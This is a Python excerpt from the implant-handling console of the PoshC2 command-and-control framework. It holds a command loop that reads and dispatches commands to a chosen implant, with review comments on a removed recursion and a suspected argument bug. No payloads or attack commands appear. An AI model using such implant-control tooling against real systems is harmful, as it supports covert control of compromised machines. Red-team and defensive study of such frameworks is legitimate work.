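
def commandloop(implant_id, user):
    """Interactive prompt loop for *implant_id* on behalf of *user*.

    Each pass re-installs the default COMMANDS completer, reads one command
    (_read_command) and dispatches it (_dispatch). The selector is never
    rebound, so the next pass prompts for the same implant(s) again. The old
    tail call ``commandloop(implant_id_orig, user)`` at the end of each pass
    has been removed: the while loop already repeats, and the call only
    pushed one extra frame per command entered until the recursion limit was
    reached. Any exception in a pass prints a red error, pauses one second
    and hands control to startup().
    """
    while True:
        try:
            completer = tabCompleter()
            _install_completer(completer, COMMANDS)
            command = _read_command(implant_id, completer)
            _dispatch(command, implant_id, user)
        except Exception:
            print (Colours.RED)
            print ("Error running against the selected implant ID, ensure you have typed the correct information")
            print (Colours.END)
            # The exception detail is intentionally not shown to the operator;
            # add traceback.print_exc() here while debugging.
            time.sleep(1)
            # NOTE(review): the other call sites in this file pass nothing or a
            # history as the second argument (startup(user),
            # startup(user, get_history())); passing *user* twice looks
            # accidental - confirm against startup()'s signature.
            startup(user, user)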
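if __name__ == '__main__':
    # Ctrl-C ends the session through catch_exit() instead of dumping a
    # KeyboardInterrupt traceback. The previous SIGINT handler was fetched
    # but never restored, so it is no longer kept.
    signal.signal(signal.SIGINT, catch_exit)
    parser = argparse.ArgumentParser(description='The command line for handling implants in PoshC2')
    parser.add_argument('-u', '--user', help='the user for this session')
    args = parser.parse_args()
    user = args.user
    # Without -u the name is asked for interactively; an empty answer is
    # re-prompted so the session is never attributed to a blank user.
    if user is None:
        user = raw_input("Enter your username: ")
        while not user.strip():
            user = raw_input("Enter your username: ")
    startup(user)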